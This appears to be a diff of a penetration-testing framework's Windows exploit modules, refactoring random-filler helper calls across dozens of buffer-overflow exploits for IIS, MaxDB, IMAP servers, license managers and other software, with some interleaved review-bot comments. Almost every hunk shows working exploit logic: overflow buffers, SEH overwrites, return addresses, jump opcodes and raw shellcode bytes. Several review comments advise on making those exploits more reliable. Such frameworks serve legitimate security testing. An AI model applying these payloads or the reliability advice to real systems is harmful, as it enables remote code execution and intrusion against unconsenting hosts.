||||||
|
|
||||||
##
|
##
|
||||||
|
@ -65,8 +65,8 @@ class Exploits::Windows::Http::Edirectory_Host < Msf::Exploit::Remote
|
||||||
connect
|
connect
|
||||||
|
|
||||||
sploit = "GET /nds HTTP/1.1" + "\r\n"
|
sploit = "GET /nds HTTP/1.1" + "\r\n"
|
||||||
sploit << "Host: " + Rex::Text.rand_text_alphanumeric(9, payload_badchars)
|
sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)
|
||||||
sploit << "," + Rex::Text.rand_text_alphanumeric(719, payload_badchars)
|
sploit << "," + rand_text_alphanumeric(719, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit[705, seh.length] = seh
|
sploit[705, seh.length] = seh
|
||||||
sploit << "\r\n\r\n"
|
sploit << "\r\n\r\n"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -68,7 +68,7 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
|
||||||
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
|
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
|
||||||
|
|
||||||
req << "page=notify&origname=&action=return&type=Beeper&instancename="
|
req << "page=notify&origname=&action=return&type=Beeper&instancename="
|
||||||
req << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
|
req << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
|
||||||
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
|
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
|
||||||
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
|
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -66,12 +66,12 @@ class Exploits::Windows::Http::Maxdb_Webdbm_Dbname_Overflow < Msf::Exploit::Remo
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
server = Rex::Text.rand_text_english(5, payload_badchars)
|
server = rand_text_english(5, payload_badchars)
|
||||||
user = Rex::Text.rand_text_english(5, payload_badchars)
|
user = rand_text_english(5, payload_badchars)
|
||||||
pass = Rex::Text.rand_text_english(5, payload_badchars)
|
pass = rand_text_english(5, payload_badchars)
|
||||||
port = rand(65535).to_s
|
port = rand(65535).to_s
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alphanumeric(91, payload_badchars) + [target.ret].pack('V')
|
sploit = rand_text_alphanumeric(91, payload_badchars) + [target.ret].pack('V')
|
||||||
sploit << payload.encoded
|
sploit << payload.encoded
|
||||||
|
|
||||||
req = "Event=DBM_LOGON&Action=LOGON&Server=#{server}&Database=#{sploit}"
|
req = "Event=DBM_LOGON&Action=LOGON&Server=#{server}&Database=#{sploit}"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -74,7 +74,7 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
|
||||||
# Trigger the SEH by writing past the end of the page after
|
# Trigger the SEH by writing past the end of the page after
|
||||||
# the SEH is already overwritten. This avoids the other smashed
|
# the SEH is already overwritten. This avoids the other smashed
|
||||||
# pointer exceptions and goes straight to the payload.
|
# pointer exceptions and goes straight to the payload.
|
||||||
buf = Rex::Text.rand_text_alphanumeric(16384)
|
buf = rand_text_alphanumeric(16384)
|
||||||
buf[1586, payload.encoded.length] = payload.encoded
|
buf[1586, payload.encoded.length] = payload.encoded
|
||||||
buf[3638, 5] = "\xe9" + [-2052].pack('V')
|
buf[3638, 5] = "\xe9" + [-2052].pack('V')
|
||||||
buf[3643, 2] = "\xeb\xf9"
|
buf[3643, 2] = "\xeb\xf9"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -67,7 +67,7 @@ class Exploits::Windows::Http::Minishare_GET_Overflow < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
uri = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
|
uri = rand_text_alphanumeric(target['Rets'][0])
|
||||||
uri << [target['Rets'][1]].pack('V')
|
uri << [target['Rets'][1]].pack('V')
|
||||||
uri << payload.encoded
|
uri << payload.encoded
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -72,7 +72,7 @@ class Exploits::Windows::Http::Navicopa_Get_Overflow < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alphanumeric(228, payload_badchars)
|
sploit = rand_text_alphanumeric(228, payload_badchars)
|
||||||
sploit << [target.ret].pack('V') + payload.encoded
|
sploit << [target.ret].pack('V') + payload.encoded
|
||||||
|
|
||||||
uri = '/' + sploit
|
uri = '/' + sploit
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -59,7 +59,7 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
lang = Rex::Text.rand_text_alphanumeric(1900)
|
lang = rand_text_alphanumeric(1900)
|
||||||
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
|
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
|
||||||
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
|
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
|
||||||
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
|
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -77,8 +77,8 @@ class Exploits::Windows::Http::Oracle9i_Xdb_Pass < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_english(4, payload_badchars) + ":"
|
sploit = rand_text_english(4, payload_badchars) + ":"
|
||||||
sploit << Rex::Text.rand_text_english(442, payload_badchars)
|
sploit << rand_text_english(442, payload_badchars)
|
||||||
sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
|
sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
|
||||||
sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded
|
sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -60,7 +60,7 @@ class Exploits::Windows::Http::PeerCast_URL < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
pat = Rex::Text.rand_text_alphanumeric(1024)
|
pat = rand_text_alphanumeric(1024)
|
||||||
pat[768, 4] = [target.ret].pack('V')
|
pat[768, 4] = [target.ret].pack('V')
|
||||||
pat[812, 5] = [0xe9, -517].pack('CV')
|
pat[812, 5] = [0xe9, -517].pack('CV')
|
||||||
pat[300, payload.encoded.length] = payload.encoded
|
pat[300, payload.encoded.length] = payload.encoded
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -95,7 +95,7 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
|
||||||
|
|
||||||
num = 1046 - payload.encoded.length
|
num = 1046 - payload.encoded.length
|
||||||
uri = '/content/%#0' + num.to_s + 'x' + payload.encoded
|
uri = '/content/%#0' + num.to_s + 'x' + payload.encoded
|
||||||
uri << "\xeb\x06" + Rex::Text.rand_text_alphanumeric(2)
|
uri << "\xeb\x06" + rand_text_alphanumeric(2)
|
||||||
uri << [target.ret].pack('V')
|
uri << [target.ret].pack('V')
|
||||||
uri << "\xe9\x2d\xff\xff\xff"
|
uri << "\xe9\x2d\xff\xff\xff"
|
||||||
uri << '#0100x.mp3'
|
uri << '#0100x.mp3'
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -65,7 +65,7 @@ include Exploit::Remote::Tcp
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
pat = Rex::Text.rand_text_alphanumeric(4000)
|
pat = rand_text_alphanumeric(4000)
|
||||||
pat[8,4] = [target.ret].pack('V')
|
pat[8,4] = [target.ret].pack('V')
|
||||||
pat[103, payload.encoded.length] = payload.encoded
|
pat[103, payload.encoded.length] = payload.encoded
|
||||||
pat = Rex::Text.uri_encode(pat)
|
pat = Rex::Text.uri_encode(pat)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -70,7 +70,7 @@ class Exploits::Windows::Http::Sybase_Easerver < Msf::Exploit::Remote
|
||||||
print_status( "Attempting to exploit...")
|
print_status( "Attempting to exploit...")
|
||||||
|
|
||||||
# Building the evil buffer
|
# Building the evil buffer
|
||||||
crash = Rex::Text.rand_text_alphanumeric(5000, payload_badchars)
|
crash = rand_text_alphanumeric(5000, payload_badchars)
|
||||||
crash[ target['Offset'] - 4, 2 ] = "\xeb\x06"
|
crash[ target['Offset'] - 4, 2 ] = "\xeb\x06"
|
||||||
crash[ target['Offset'] , 4 ] = [target.ret].pack('V')
|
crash[ target['Offset'] , 4 ] = [target.ret].pack('V')
|
||||||
crash[ target['Offset'] + 4, payload.encoded.length ] = payload.encoded
|
crash[ target['Offset'] + 4, payload.encoded.length ] = payload.encoded
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -95,7 +95,7 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
c = connect
|
c = connect
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(8192)
|
buf = rand_text_english(8192)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
buf[257, seh.length] = seh
|
buf[257, seh.length] = seh
|
||||||
|
|
||||||
|
@ -124,7 +124,7 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
def fingerprint
|
def fingerprint
|
||||||
|
|
||||||
res = download(Rex::Text.rand_text_alphanumeric(12) + '.txt') || return
|
res = download(rand_text_alphanumeric(12) + '.txt') || return
|
||||||
|
|
||||||
m = res.match(/in <b>(.*)<\/b> on line/smi)
|
m = res.match(/in <b>(.*)<\/b> on line/smi)
|
||||||
return if not m
|
return if not m
|
||||||
|
|
|
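Review bot: `buf = rand_text_english(8192)` in the hunk at -95 omits `payload_badchars`, whereas the other modules in this commit pass it to `rand_text_english` (the FreeFTPD and Oracle XDB sections, for instance); since the SEH record is spliced into this filler at offset 257, filler bytes the target mangles would corrupt the request before the SEH chain is reached. If the omission is intentional, a comment on that line saying why would help; otherwise `buf = rand_text_english(8192, payload_badchars)` matches the rest of the commit. The exploit method continues outside the hunk.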
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -84,10 +84,10 @@ class Exploits::Windows::Iis::MS01_033_IDQ < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alphanumeric(1) + ".idq?" + Rex::Text.rand_text_alphanumeric(232, payload_badchars)
|
sploit = rand_text_alphanumeric(1) + ".idq?" + rand_text_alphanumeric(232, payload_badchars)
|
||||||
sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4]
|
sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4]
|
||||||
sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" + Rex::Text.rand_text_alphanumeric(1)
|
sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" + rand_text_alphanumeric(1)
|
||||||
sploit << " HTTP/1.0\r\n" + make_nops(10) + Rex::Text.rand_text_alphanumeric(36, payload_badchars)
|
sploit << " HTTP/1.0\r\n" + make_nops(10) + rand_text_alphanumeric(36, payload_badchars)
|
||||||
|
|
||||||
uri = '/' + sploit + payload.encoded
|
uri = '/' + sploit + payload.encoded
|
||||||
|
|
||||||
|
|
|
@ -134,7 +134,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
||||||
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
||||||
|
|
||||||
if datastore['invalid_search_request'] == true
|
if datastore['invalid_search_request'] == true
|
||||||
xml = Rex::Text.rand_text(rand(1024) + 32)
|
xml = rand_text(rand(1024) + 32)
|
||||||
end
|
end
|
||||||
|
|
||||||
# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
|
# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
|
||||||
|
|
|
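Review bot: `if datastore['invalid_search_request'] == true` compares the option with the boolean `true`; if the datastore returns the option as a string (as it does for values typed at the console), the branch never fires and `xml = rand_text(rand(1024) + 32)` is dead code. Worth confirming how the option is declared (outside the hunk) and whether the framework normalises it to a boolean; if not, a string-tolerant test such as `if datastore['invalid_search_request'].to_s =~ /^(true|yes|1)$/i` is the safer form. The enclosing method starts and ends outside the hunk.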
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -73,9 +73,9 @@ class Exploits::Windows::Imap::Eudora_List < Msf::Exploit::Remote
|
||||||
jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
|
jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
|
||||||
jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"
|
jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"
|
||||||
|
|
||||||
sploit = "a001 LIST " + Rex::Text.rand_text_alpha_upper(20, payload_badchars)
|
sploit = "a001 LIST " + rand_text_alpha_upper(20, payload_badchars)
|
||||||
sploit << payload.encoded + "\xeb\x06" + make_nops(2) + [target.ret].pack('V')
|
sploit << payload.encoded + "\xeb\x06" + make_nops(2) + [target.ret].pack('V')
|
||||||
sploit << make_nops(8) + jmp + Rex::Text.rand_text_alpha_upper(40, payload_badchars)
|
sploit << make_nops(8) + jmp + rand_text_alpha_upper(40, payload_badchars)
|
||||||
sploit << "}" + "\r\n"
|
sploit << "}" + "\r\n"
|
||||||
|
|
||||||
sock.put(sploit)
|
sock.put(sploit)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -74,7 +74,7 @@ class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
|
||||||
# Jump over code
|
# Jump over code
|
||||||
req << "\x74\x32\x75\x30"
|
req << "\x74\x32\x75\x30"
|
||||||
req << [target.ret].pack('V')
|
req << [target.ret].pack('V')
|
||||||
req << Rex::Text.rand_text_alphanumeric(44)
|
req << rand_text_alphanumeric(44)
|
||||||
|
|
||||||
# GetEIP code
|
# GetEIP code
|
||||||
req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"
|
req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"
|
||||||
|
@ -87,7 +87,7 @@ class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
|
||||||
req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"
|
req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"
|
||||||
|
|
||||||
# Run off the stack, so we don't kill our payload, or something...
|
# Run off the stack, so we don't kill our payload, or something...
|
||||||
req << Rex::Text.rand_text_alphanumeric(600)
|
req << rand_text_alphanumeric(600)
|
||||||
|
|
||||||
# Terminate the request
|
# Terminate the request
|
||||||
req << "\r\n"
|
req << "\r\n"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -59,8 +59,8 @@ class Exploits::Windows::Imap::MailEnableImapLoginOverflow < Msf::Exploit::Remot
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
auth = "a001 LOGIN " + Rex::Text.rand_text_alpha_upper(4) + " {10}\r\n"
|
auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n"
|
||||||
sploit = Rex::Text.rand_text_alpha_upper(556) + [target.ret].pack('V')
|
sploit = rand_text_alpha_upper(556) + [target.ret].pack('V')
|
||||||
sploit << payload.encoded + "\r\n\r\n"
|
sploit << payload.encoded + "\r\n\r\n"
|
||||||
|
|
||||||
res = sock.recv(50)
|
res = sock.recv(50)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -66,7 +66,7 @@ class Exploits::Windows::Imap::MailEnableImapStatusOverflow < Msf::Exploit::Remo
|
||||||
connect_login
|
connect_login
|
||||||
|
|
||||||
seh = generate_seh_payload(target['Rets'][1])
|
seh = generate_seh_payload(target['Rets'][1])
|
||||||
buf = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
|
buf = rand_text_alphanumeric(target['Rets'][0])
|
||||||
req = "a001 STATUS \".\x00" + buf + seh
|
req = "a001 STATUS \".\x00" + buf + seh
|
||||||
req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
|
req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
|
||||||
sock.put(req)
|
sock.put(req)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -72,7 +72,7 @@ class Exploits::Windows::Imap::MailEnableImapW3CLoggingSelectOverflow < Msf::Exp
|
||||||
def exploit
|
def exploit
|
||||||
connect_login
|
connect_login
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_alphanumeric(6196, payload_badchars)
|
buf = rand_text_alphanumeric(6196, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
req = 'a01 SELECT ' + buf + seh + "\r\n"
|
req = 'a01 SELECT ' + buf + seh + "\r\n"
|
||||||
sock.put(req)
|
sock.put(req)
|
||||||
|
|
|
@ -68,7 +68,7 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Creating overflow request for fp30reg.dll...")
|
print_status("Creating overflow request for fp30reg.dll...")
|
||||||
|
|
||||||
pat = Rex::Text.rand_text_alphanumeric(0xdead)
|
pat = rand_text_alphanumeric(0xdead)
|
||||||
pat[128, 4] = [target.ret].pack('V')
|
pat[128, 4] = [target.ret].pack('V')
|
||||||
pat[264, 4] = [target.ret].pack('V')
|
pat[264, 4] = [target.ret].pack('V')
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -88,7 +88,7 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
|
pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
|
||||||
seh = generate_seh_payload(target['Rets'][1])
|
seh = generate_seh_payload(target['Rets'][1])
|
||||||
pat[target['Rets'][0]-4, seh.length] = seh
|
pat[target['Rets'][0]-4, seh.length] = seh
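Review bot: `pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK` still carries a bare `# HACK` marker with no explanation of why digits and Z/z must not appear in the filler; whatever the reason is, it belongs in the comment, e.g. `# digits and Z/z are replaced with 'A' because <reason>`. If the wrapper takes a badchars string as its second argument the way `Rex::Text` does, the same character set can be produced directly with `rand_text_alpha(8192, 'Zz')`, which keeps the length and drops the regex pass. The `exploit` method continues past the hunk.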
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -105,7 +105,7 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(8192, payload_badchars)
|
buf = rand_text_english(8192, payload_badchars)
|
||||||
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
||||||
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
|
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
|
||||||
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
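Review bot: `buf[target['Rets'][0] - 0, 4]` keeps a `- 0` that does nothing; it appears to be there to line up visually with the `- 4` and `+ 4` on the neighbouring lines, but a reader has to stop and check whether a value is missing. Either drop it (`buf[target['Rets'][0], 4] = [ target['Rets'][1] ].pack('V')`) or say so in a trailing comment. The `exploit` method continues past the hunk.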
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -85,7 +85,7 @@ class Exploits::Windows::License::Sentinel_LM7_UDP_Overflow < Msf::Exploit::Remo
|
||||||
connect_udp
|
connect_udp
|
||||||
|
|
||||||
# Payload goes first
|
# Payload goes first
|
||||||
buf = payload.encoded + Rex::Text.rand_text_english(2048-payload.encoded.length)
|
buf = payload.encoded + rand_text_english(2048-payload.encoded.length)
|
||||||
|
|
||||||
# Return to a pop/pop/ret via SEH
|
# Return to a pop/pop/ret via SEH
|
||||||
buf[836, 4] = [target.ret].pack('V')
|
buf[836, 4] = [target.ret].pack('V')
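Review bot: `rand_text_english(2048-payload.encoded.length)` on the `buf` line goes negative when the encoded payload exceeds 2048 bytes; as far as I know Rex's generator then returns an empty string, so `buf` ends up shorter than intended and the `buf[836, 4]` assignment below can fall outside the string. This is presumably prevented by the module's declared payload space (outside the hunk), but the invariant is not visible here; a comment such as `# assumes payload.encoded.length <= 2048, enforced by the Payload 'Space' entry` would record it, or `raise ArgumentError, "payload too large" if payload.encoded.length > 2048` would fail loudly instead of silently. The same subtraction pattern appears in Eiqnetworks_LICMGR_ADDLICENSE (where `String#*` with a negative count raises instead), MS06_025_RRAS, MS06_040_NETAPI and MS04_045.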
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -64,7 +64,7 @@ class Exploits::Windows::Lpd::Hummingbird_Exceed_Lpd < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
filler = Rex::Text.rand_text_english(target['Offset'], payload_badchars)
|
filler = rand_text_english(target['Offset'], payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit = filler + seh
|
sploit = filler + seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -58,7 +58,7 @@ class Exploits::Windows::Lpd::HNIPrintd < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
req = Rex::Text.rand_text_alphanumeric(8192)
|
req = rand_text_alphanumeric(8192)
|
||||||
req[ 0, 2] = "\xeb\x33"
|
req[ 0, 2] = "\xeb\x33"
|
||||||
req[ 49, 4] = [target.ret].pack('V')
|
req[ 49, 4] = [target.ret].pack('V')
|
||||||
req[ 53, payload.encoded.length ] = payload.encoded
|
req[ 53, payload.encoded.length ] = payload.encoded
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -92,7 +92,7 @@ class Exploits::Windows::Misc::Eiqnetworks_LICMGR_ADDLICENSE < Msf::Exploit::Rem
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
filler = Rex::Text.rand_text_english(1) * (target['Offset'] - payload.encoded.length)
|
filler = rand_text_english(1) * (target['Offset'] - payload.encoded.length)
|
||||||
sploit = "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') + "&";
|
sploit = "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') + "&";
|
||||||
|
|
||||||
sock.put(sploit)
|
sock.put(sploit)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -73,7 +73,7 @@ class Exploits::Windows::Misc::Eiqnetworks_Esa_Topology_DELETEDEVICE < Msf::Expl
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
filler = Rex::Text.rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)
|
filler = rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)
|
||||||
|
|
||||||
sploit = "DELETEDEVICE&" + filler + payload.encoded
|
sploit = "DELETEDEVICE&" + filler + payload.encoded
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -61,7 +61,7 @@ class Exploits::Windows::Misc::Goodtech_Telnet < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_english(10020, payload_badchars)
|
sploit = rand_text_english(10020, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
|
|
||||||
sploit[10012, seh.length] = seh
|
sploit[10012, seh.length] = seh
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -68,7 +68,7 @@ class Exploits::Windows::Misc::Mercury_Phonebook < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
